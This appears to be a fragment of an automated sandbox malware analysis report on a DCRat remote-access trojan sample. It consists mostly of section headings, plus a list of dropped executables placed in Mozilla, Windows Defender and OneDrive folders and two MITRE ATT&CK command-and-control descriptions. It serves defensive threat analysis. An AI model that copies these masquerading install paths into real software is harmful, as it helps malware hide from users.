Threatname: DCRat

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Mozilla Maintenance Service\69ddcba757bf72

C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe

C:\Program Files (x86)\Mozilla Maintenance Service\smss.exe:Zone.Identifier

C:\Program Files (x86)\Windows Defender\en-GB\6661cc8d955995

C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe

C:\Program Files (x86)\Windows Defender\en-GB\qLBhpsNtheWbwIdhOeZ.exe:Zone.Identifier

C:\Program Files\Windows Media Player\en-GB\6661cc8d955995

C:\Program Files\Windows Media Player\en-GB\qLBhpsNtheWbwIdhOeZ.exe

C:\Program Files\Windows Media Player\en-GB\qLBhpsNtheWbwIdhOeZ.exe:Zone.Identifier

C:\Users\Default\OneDrive\6661cc8d955995

C:\Users\Default\OneDrive\qLBhpsNtheWbwIdhOeZ.exe

Windows Analysis Report
9D7RwuJrth.exe

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre